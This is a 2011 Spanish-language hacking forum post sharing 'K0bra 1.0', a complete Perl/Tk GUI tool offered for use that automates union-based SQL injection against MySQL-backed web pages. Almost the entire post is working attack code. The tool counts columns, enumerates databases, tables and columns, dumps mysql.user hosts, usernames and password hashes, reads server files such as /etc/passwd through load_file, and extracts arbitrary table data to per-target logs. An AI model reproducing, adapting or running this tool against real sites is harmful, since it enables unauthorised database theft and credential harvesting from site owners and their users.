[Perl Tk] K0bra 1.0

  • 0 Respuestas
  • 1577 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil

[Perl Tk] K0bra 1.0

  • en: Julio 03, 2011, 10:01:34 pm
Hola a les dejo un programa para escanear la vulnerabilidad SQL de una forma
avanzada

Opciones

  • Scanea el numero de columnas[/li]
  • Busca el numero magico automaticamente y muestra data sobre la DB[/li]
  • Dumpea mysql.user[/li]
  • Lista bases de datos encontradas , asi como tablas y columnas[/li]
  • Permite visualizar archivos con load_file()[/li]
  • Codificacion y decodificacion para ascii y hex[/li]
  • Dumpea valores sobre cualquier columna[/li]
  • Guarda todo los registros en un archivo de texto con el nombre de la web[/li][/list]


    Imagenes







    Código: Perl
    1. #!usr/bin/perl
    2. #K0bra 1.0 (C) Doddy Hackman 2011
    3.  
    4. use Tk;
    5. use Tk::ROText;
    6. use LWP::UserAgent;
    7. use URI::Split qw(uri_split);
    8. use Win32;
    9.  
    10. my $bypass = "--";
    11. my $save = "";
    12.  
    13. if ($^O eq 'MSWin32') {
    14. use Win32::Console;
    15. Win32::Console::Free();
    16. }
    17.  
    18. my $nave = LWP::UserAgent->new();
    19. $nave->timeout(5);
    20. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
    21.  
    22. my $logo = MainWindow->new();
    23. $logo->title("k0bra 1.0 (C) Doddy Hackman 2011");
    24. $logo->geometry("500x510+20+20");
    25. $logo->resizable(0,0);
    26. $logo->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>25,-y=>20);
    27. my $targetero = $logo->Entry(-width=>50,-text=>"http://127.0.0.1/sql.php?id=")->place(-y=>23,-x=>90);
    28. $logo->Button(-text=>"Scan",-width=>10,-command=>\&start)->place(-y=>20,-x=>400);
    29. $logo->Label(-text=>"Options",-font=>"Impact1")->place(-x=>210,-y=>70);
    30. $logo->Button(-text=>"Get DBS",-width=>10,-command=>\&getdbs)->place(-y=>110,-x=>40);
    31. $logo->Button(-text=>"Get Tables",-width=>10,-command=>\&schematablesdb)->place(-y=>110,-x=>120);
    32. $logo->Button(-text=>"Get Columns",-width=>10,-command=>\&schemacolumnsdb)->place(-y=>110,-x=>200);
    33. $logo->Button(-text=>"mysql users",-width=>15,-command=>\&mynow)->place(-y=>110,-x=>280);
    34. $logo->Button(-text=>"load_file",-width=>10,-command=>\&myfile)->place(-y=>110,-x=>390);
    35.  
    36. $logo->Button(-text=>"Dump",-width=>10,-command=>\&dum)->place(-y=>150,-x=>90);
    37. $logo->Button(-text=>"Hex",-width=>10,-command=>\&per1)->place(-y=>150,-x=>170);
    38. $logo->Button(-text=>"ASCII",-width=>15,-command=>\&per2)->place(-y=>150,-x=>250);
    39. $logo->Button(-text=>"Show Logs",-width=>10,-command=>\&china)->place(-y=>150,-x=>360);
    40.  
    41. $logo->Label(-text=>"Details : ",-font=>"Impact1")->place(-y=>230,-x=>90);
    42.  
    43. my $informatero = $logo->Listbox(-height=>5,-width=>40)->place(-y=>210,-x=>160);
    44.  
    45. $logo->Label(-text=>"Databases",-font=>"Impact1")->place(-y=>320,-x=>60);
    46. $logo->Label(-text=>"Tables",-font=>"Impact1")->place(-y=>320,-x=>190);
    47. $logo->Label(-text=>"Columns",-font=>"Impact1")->place(-y=>320,-x=>330);
    48.  
    49. my $datero = $logo->Listbox(-width=>20)->place(-y=>350,-x=>40);
    50. my $tablero = $logo->Listbox(-width=>20)->place(-y=>350,-x=>180);
    51. my $columnero = $logo->Listbox(-width=>20)->place(-y=>350,-x=>320);
    52.  
    53. MainLoop;
    54.  
    55. sub start {
    56.  
    57. $informatero->delete("0.0","end");
    58. $datero->delete("0.0","end");
    59. $tablero->delete("0.0","end");
    60. $columnero->delete("0.0","end");
    61.  
    62. my $tengo = $targetero->get;
    63.  
    64. my ($gen,$save,$control) = &length($tengo,"--");
    65. if ($control eq 1) {
    66. $logo->update;
    67. $targetero->configure(-text=>$gen);
    68. details($gen,$bypass,$save);
    69. } else {
    70. Win32::MsgBox("Not found length columns",0,"K0bra 1.0");
    71. }
    72. }
    73.  
    74. sub length {
    75. my $rows  = "0";
    76. my $asc;
    77. my $page = $_[0];
    78. ($pass1,$pass2) = &bypass($_[1]);
    79. $inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
    80. $code = toma($inyection);
    81. $logo->update;
    82.  
    83. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
    84.  
    85. $logo->update;
    86.  
    87. my $testar1 = toma($page."1".$pass1."and".$pass1."1=0".$pass2);
    88. my $testar2 = toma($page."1".$pass1."and".$pass1."1=1".$pass2);
    89.  
    90. unless ($testar1 eq $testar2) {
    91. my $patha = $1;
    92. $logo->update;
    93. chomp $patha;
    94. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
    95. $total = "1";
    96. for my $rows(2..200) {
    97. $logo->update;
    98. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
    99. $total.= ",".$rows;
    100. $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
    101. $test = toma($injection);
    102. if ($test=~/RATSXPDOWN/) {
    103. @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
    104. $control = 1;
    105. my $save = comer($_[0]);
    106. savefile($save.".txt","\n[Target confirmed] : $page");
    107. savefile($save.".txt","[Bypass] : $_[1]\n");
    108. savefile($save.".txt","[Limit] : The site has $rows columns");
    109. savefile($save.".txt","[Data] : The number @number print data");
    110. $informatero->insert("end","</li><li type="square"> The site has $rows columns");[/li][/list]
    111. $informatero->insert("end","</li><li type="square"> The number @number print data");[/li][/list]
    112. if ($patha) {
    113. savefile($save.".txt","[Full Path Discloure] : $patha");
    114. }
    115. $total=~s/$number[0]/hackman/;
    116. savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
    117. return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
    118. }
    119. }
    120. }
    121. } else {
    122. Win32::MsgBox("Not vulnerable",0,"K0bra 1.0");
    123. next;
    124. }
    125. }
    126.  
    127. sub details {
    128. my ($page,$bypass,$save) = @_;
    129. ($pass1,$pass2) = &bypass($bypass);
    130. savefile($save.".txt","\n");
    131. if ($page=~/(.*)hackman(.*)/ig) {
    132. my  ($start,$end) = ($1,$2);
    133. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
    134. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
    135. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
    136. $test1 = toma($inforschema);
    137. $test2 = toma($mysqluser);
    138. $informatero->insert("end","");
    139. if ($test2=~/ERTOR854/ig) {
    140. savefile($save.".txt","[mysql.user] : ON");
    141. $informatero->insert("end","[mysql.user] : ON");
    142. } else {
    143. $informatero->insert("end","[mysql.user] : OFF");
    144. savefile($save.".txt","[mysql.user] : OFF");
    145. }
    146. if ($test1=~/ERTOR854/ig) {
    147. $informatero->insert("end","[information_schema.tables] : ON");
    148. savefile($save.".txt","[information_schema.tables] : ON");
    149. } else {
    150. $informatero->insert("end","[information_schema.tables] : OFF");
    151. savefile($save.".txt","[information_schema.tables] : OFF");
    152. }
    153. if ($test3=~/ERTOR854/ig) {
    154. $informatero->insert("end","[load_file] : ON");
    155. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
    156. }
    157. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
    158. $injection = $start.$concat.$end.$pass2;
    159. $code = toma($injection);
    160. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
    161. $informatero->insert("end","");
    162. $informatero->insert("end","</li><li type="square"> DB Version : $1");[/li][/list]
    163. $informatero->insert("end","</li><li type="square"> DB Name : $2");[/li][/list]
    164. $informatero->insert("end","</li><li type="square"> user_name : $3");[/li][/list]
    165. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
    166. } else {
    167. Win32::MsgBox("Not Found DB Info",0,"K0bra 1.0");
    168. }
    169. }
    170. }
    171.  
    172.  
    173. sub getdbs {
    174. $datero->delete("0.0","end");
    175. my $page = $targetero->get;
    176. my $save = comer($page);
    177. my $page1 = $page;
    178. savefile($save.".txt","\n");
    179. ($pass1,$pass2) = &bypass($bypass);
    180. $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    181. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
    182. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    183. my $limita = $1;
    184. $logo->update;
    185. savefile($save.".txt","</li><li type="square"> Databases Length : $limita\n");[/li][/list]
    186. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    187. $real = "1";
    188. for my $limit(0..$limita) {
    189. $logo->update;
    190. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
    191. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    192. my $control = $1;
    193. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
    194. $datero->insert("end",$control);
    195. savefile($save.".txt","[Database $real Found] : $control");
    196. $real++;
    197. }
    198. }
    199. }
    200. } else {
    201. Win32::MsgBox("information_schema not found",0,"K0bra 1.0");
    202. }
    203. }
    204.  
    205.  
    206. sub schematablesdb {
    207.  
    208. $tablero->delete("0.0","end");
    209.  
    210. my $page = $targetero->get;
    211.  
    212. my $save = comer($page);
    213.  
    214. $d = $datero->curselection();
    215.  
    216. for my $id (@$d) {
    217. my $db = $datero->get($id);
    218.  
    219. my $page1 = $page;
    220. savefile($save.".txt","\n");
    221. ($pass1,$pass2) = &bypass($bypass);
    222. savefile($save.".txt","[DB] : $db");
    223. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    224. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    225. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
    226. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
    227. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
    228. $logo->update;
    229. savefile($save.".txt","</li><li type="square"> Tables Length :  $1\n");[/li][/list]
    230. my $limit = $1;
    231. $real = "1";
    232. for my $lim(0..$limit) {
    233. $logo->update;
    234. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
    235. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
    236. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    237. my $table = $1;
    238. chomp $table;
    239. savefile($save.".txt","[Table $real Found : $table ]");
    240. $tablero->insert("end",$db.".".$table);
    241. $real++;
    242. }}
    243. } else {
    244. Win32::MsgBox("information_schema not found",0,"K0bra 1.0");
    245. }}}
    246.  
    247. sub schemacolumnsdb {
    248.  
    249. $columnero->delete("0.0","end");
    250.  
    251. my $page = $targetero->get;
    252. my $save = comer($page);
    253.  
    254. $d = $tablero->curselection();
    255.  
    256. for my $id (@$d) {
    257. my $da = $tablero->get($id);
    258.  
    259. if ($da=~/(.*)\.(.*)/) {
    260. my ($db,$table) = ($1,$2);
    261.  
    262. my $page3 = $page;
    263. my $page4 = $page;
    264.  
    265. savefile($save.".txt","\n");
    266. ($pass1,$pass2) = &bypass($bypass);
    267. savefile($save.".txt","\n[DB] : $db");
    268. savefile($save.".txt","[Table] : $table");
    269. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    270. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
    271. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    272. savefile($save.".txt","[Columns length : $1 ]\n");
    273. my $si = $1;
    274. chomp $si;
    275. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
    276. $real = "1";
    277. for my $limit2(0..$si) {
    278. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
    279. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    280. $columnero->insert("end",$1);
    281. savefile($save.".txt","[Column $real] : $1");
    282. $real++;
    283. }
    284. }
    285. } else {
    286. Win32::MsgBox("information_schema not found",0,"K0bra 1.0");
    287. }
    288. }
    289. }
    290. }
    291.  
    292. sub mynow {
    293.  
    294. my $p = $targetero->get;
    295.  
    296. $mi = MainWindow->new();
    297. $mi->title("Mysql Extractor");
    298. $mi->geometry("500x310+20+20");
    299. $mi->resizable(0,0);
    300.  
    301. $mi->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>50,-y=>20);
    302. my $guix = $mi->Entry(-width=>40,-text=>$p)->place(-y=>23,-x=>110);
    303. $mi->Button(-width=>10,-text=>"Extract",-command=>\&tengorax)->place(-y=>20,-x=>360);
    304.  
    305. $mi->Label(-text=>"Host",-font=>"Impact1")->place(-x=>60,-y=>120);
    306. $mi->Label(-text=>"User",-font=>"Impact1")->place(-x=>200,-y=>120);
    307. $mi->Label(-text=>"Password",-font=>"Impact1")->place(-x=>360,-y=>120);
    308.  
    309. my $hostero = $mi->Listbox(-width=>20)->place(-y=>150,-x=>40);
    310. my $usero = $mi->Listbox(-width=>23)->place(-y=>150,-x=>180);
    311. my $pasero = $mi->Listbox(-width=>20)->place(-y=>150,-x=>340);
    312.  
    313.  
    314. sub tengorax {
    315.  
    316. my $page = $guix->get;
    317. my $save = comer($page);
    318.  
    319. my $cop = $page;
    320. my $cop1 = $page;
    321. savefile($save.".txt","\n");
    322.  
    323. ($pass1,$pass2) = &bypass($bypass);
    324. $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
    325. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
    326. if ($code=~/RATSXPDOWN/ig){
    327. $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
    328. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
    329. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
    330. $mi->update;
    331. savefile($save.".txt","\n</li><li type="square"> Users mysql Found : $1\n");[/li][/list]
    332. for my $limit(0..$1) {
    333. $mi->update;
    334. $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
    335. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
    336. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
    337. $mi->update;
    338. $hostero->insert("end",$1);
    339. $usero->insert("end",$2);
    340. $pasero->insert("end",$3);
    341. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
    342. } else {
    343. last;
    344. }}}
    345. } else {
    346. Win32::MsgBox("mysql.user not found",0,"K0bra 1.0");
    347. }
    348. }
    349. }
    350.  
    351. sub myfile {
    352.  
    353. my $pag = $targetero->get;
    354.  
    355. $loa = MainWindow->new();
    356. $loa->title("load_file helper");
    357. $loa->geometry("380x400+20+20");
    358. $loa->resizable(0,0);
    359.  
    360. $loa->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>20,-y=>20);
    361. my $aa = $loa->Entry(-width=>40,-text=>$pag)->place(-y=>23,-x=>80);
    362. $loa->Label(-text=>"File : ",-font=>"Impact1")->place(-y=>60,-x=>23);
    363. my $tea = $loa->Entry(-width=>20,-text=>"C:\leer.txt")->place(-y=>63,-x=>63);
    364. $loa->Button(-text=>"Encode",-width=>8,-command=>\&eno)->place(-y=>62,-x=>200);
    365. $loa->Button(-text=>"Show",-width=>8,-command=>\&ena)->place(-y=>62,-x=>263);
    366.  
    367. $loa->Label(-text=>"Output",-font=>"Impact1")->place(-x=>160,-y=>130);
    368. my $mo = $loa->ROText(-width=>45,-height=>15)->place(-y=>170,-x=>25);
    369.  
    370. sub eno {
    371. my $t = $tea->get;
    372. if ($t=~/0x/) {
    373. $tea->configure(-text=>decode($t));
    374. } else {
    375. $tea->configure(-text=>encode($t));
    376. }
    377. }
    378.  
    379. sub ena {
    380.  
    381. $mo->delete("0.0","end");
    382.  
    383. my $page = $aa->get;
    384. my $save = comer($page);
    385.  
    386. savefile($save.".txt","\n");
    387. ($pass1,$pass2) = &bypass($bypass);
    388. if ($page =~/(.*)hackman(.*)/g) {
    389. my $start = $1; my $end = $2;
    390. my $file = $tea->get;
    391. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(".encode($file)."),char(69,82,84,79,82,56,53,52))))";
    392. $code = toma($start.$concat.$end.$pass2);
    393. if ($code =~/ERTOR854(.*)ERTOR854/g) {
    394. $mo->insert("end",$1);
    395. savefile($save.".txt","[File Found] : $file");
    396. savefile($save.".txt","\n[Source Start]\n");
    397. savefile($save.".txt","$1");
    398. savefile($save.".txt","\n[Source End]\n");
    399. } else {
    400. Win32::MsgBox("Error",0,"K0bra 1.0");
    401. }}}}
    402.  
    403. sub dum {
    404.  
    405. my $pa = $targetero->get;
    406.  
    407. $max = MainWindow->new();
    408. $max->title("Dump Values");
    409. $max->geometry("480x380+20+20");
    410. $max->resizable(0,0);
    411.  
    412. $max->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>50,-y=>20);
    413. my $tata = $max->Entry(-width=>40,-text=>$pa)->place(-y=>23,-x=>110);
    414.  
    415. $max->Label(-text=>"Table : ",-font=>"Impact1")->place(-x=>50,-y=>60);
    416. my $tato = $max->Entry(-width=>20)->place(-x=>105,-y=>63);
    417.  
    418. $max->Label(-text=>"Column1 : ",-font=>"Impact1")->place(-y=>90,-x=>50);
    419. my $tatu = $max->Entry(-width=>20)->place(-x=>130,-y=>93);
    420.  
    421. $max->Label(-text=>"Column2 : ",-font=>"Impact1")->place(-y=>130,-x=>50);
    422. my $tita= $max->Entry(-width=>20)->place(-y=>133,-x=>130);
    423.  
    424.  
    425. $max->Button(-width=>10,-text=>"Extract",-command=>\&tengor)->place(-y=>20,-x=>360);
    426.  
    427. $max->Label(-text=>"Column1",-font=>"Impact1")->place(-x=>100,-y=>180);
    428. $max->Label(-text=>"Column2",-font=>"Impact1")->place(-x=>300,-y=>180);
    429.  
    430. my $duta1 = $max->Listbox(-width=>20)->place(-y=>210,-x=>70);
    431. my $duta2 = $max->Listbox(-width=>23)->place(-y=>210,-x=>260);
    432.  
    433.  
    434. sub tengor {
    435.  
    436. $duta1->delete("0.0","end");
    437. $duta2->delete("0.0","end");
    438.  
    439. my $page = $tata->get;
    440. my $tabla = $tato->get;
    441. my $col1 = $tatu->get;
    442. my $col2 = $tita->get;
    443.  
    444. my $save = comer($page);
    445.  
    446. savefile($save.".txt","\n");
    447.  
    448. ($pass1,$pass2) = &bypass($bypass);
    449. if ($page=~/(.*)hackman(.*)/){
    450. my $start = $1;
    451. my $end = $2;
    452. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($col1),char(69,82,84,79,82,56,53,52))))";
    453. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$tabla.$pass2);
    454. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$col1,char(69,82,84,79,82,56,53,52),$col2,char(69,82,84,79,82,56,53,52))))";
    455. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
    456. $tota = $1;
    457. savefile($save.".txt","[Table] : $tabla");
    458. savefile($save.".txt","</li><li type="square"> Length of the rows: $tota\n");[/li][/list]
    459. savefile($save.".txt","[$col1] [$col2]\n");
    460. for my $limit(0..$tota) {
    461. chomp $limit;
    462. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$tabla.$pass1."limit".$pass1.$limit.",1".$pass2);
    463. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
    464. savefile($save.".txt","[$col1] : $1   [$col2] : $2");
    465. $duta1->insert("end",$1);
    466. $duta2->insert("end",$2);
    467. } else {
    468. last;
    469. }}
    470. } else {
    471. Win32::MsgBox("Error",0,"K0bra 1.0");
    472. }}}}
    473.  
    474. sub per1 {
    475.  
    476. my $he = MainWindow->new();
    477. $he->title("Hex Converter (C) Doddy Hackman 2011");
    478. $he->geometry("420x70+20+20");
    479. $he->resizable(0,0);
    480. $he->Label(-text=>"Text : ",-font=>"Impact1")->place(-x=>20,-y=>20);
    481. my $cam = $he->Entry(-width=>30)->place(-y=>24,-x=>65);
    482. $he->Button(-text=>"Encode",-width=>10,-command=>\&paso1)->place(-y=>20,-x=>255);
    483. $he->Button(-text=>"Decode",-width=>10,-command=>\&paso2)->place(-y=>20,-x=>325);
    484.  
    485. sub paso1 {
    486.  
    487. my $caca = $cam->get();
    488. chomp $caca;
    489.  
    490. $cam->configure(-text=>encode($caca));
    491.  
    492. }
    493.  
    494. sub paso2 {
    495.  
    496. my $caca = $cam->get();
    497. chomp $caca;
    498.  
    499. $cam->configure(-text=>decode($caca));
    500.  
    501. }
    502. }
    503.  
    504.  
    505. sub per2 {
    506.  
    507. my $hexae = MainWindow->new();
    508. $hexae->title("Ascii Converter (C) Doddy Hackman 2011");
    509. $hexae->geometry("420x70+20+20");
    510. $hexae->resizable(0,0);
    511. $hexae->Label(-text=>"Text : ",-font=>"Impact1")->place(-x=>20,-y=>20);
    512. my $cama = $hexae->Entry(-width=>30)->place(-y=>24,-x=>65);
    513. $hexae->Button(-text=>"Encode",-width=>10,-command=>\&paso3)->place(-y=>20,-x=>255);
    514. $hexae->Button(-text=>"Decode",-width=>10,-command=>\&paso4)->place(-y=>20,-x=>325);
    515.  
    516.  
    517. sub paso3 {
    518.  
    519. my $caca = $cama->get();
    520. chomp $caca;
    521.  
    522. $cama->configure(-text=>ascii($caca));
    523.  
    524. }
    525.  
    526. sub paso4 {
    527.  
    528. my $caca = $cama->get();
    529. chomp $caca;
    530.  
    531. $cama->configure(-text=>ascii_de($caca));
    532.  
    533. }
    534.  
    535. }
    536.  
    537. sub china {
    538. my $de = $targetero->get;
    539. my $save = comer($de);
    540. my $file = $save.".txt";
    541. system("start logs/webs/$file");
    542. }
    543.  
    544. sub bypass {
    545. if ($_[0] eq "/*") { return ("/**/","/*"); }
    546. elsif ($_[0] eq "%20") { return ("%20","%00"); }
    547. else {return ("+","--");}}
    548.  
    549. sub ascii {
    550. return join ',',unpack "U*",$_[0];
    551. }
    552.  
    553. sub ascii_de {
    554. $_[0] = join q[], map { chr } split q[,],$_[0];
    555. return $_[0];
    556. }
    557.  
    558.  
    559. sub encode {
    560. my $string = $_[0];
    561. $hex = '0x';
    562. for (split //,$string) {
    563. $hex .= sprintf "%x", ord;
    564. }
    565. return $hex;
    566. }
    567.  
    568. sub decode {
    569. $_[0] =~ s/^0x//;
    570. $encode = join q[], map { chr hex } $_[0] =~ /../g;
    571. return $encode;
    572. }
    573.  
    574.  
    575. sub toma {
    576. return $nave->get($_[0])->content;
    577. }
    578.  
    579. sub savefile {
    580. open (SAVE,">>logs/webs/".$_[0]);
    581. print SAVE $_[1]."\n";
    582. close SAVE;
    583. }
    584.  
    585. sub comer {
    586. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    587. return $auth;
    588. }
    589.  
    590. # ¿ The End ?
    591.  
« Última modificación: Julio 17, 2011, 03:43:04 am por Sthefano02 »

 

Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 5331
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 3474
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Iframe DDos Attack Tool

Iniciado por BigBear

Respuestas: 0
Vistas: 2445
Último mensaje Julio 03, 2011, 10:06:45 pm
por BigBear
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

Respuestas: 0
Vistas: 2606
Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 3017
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d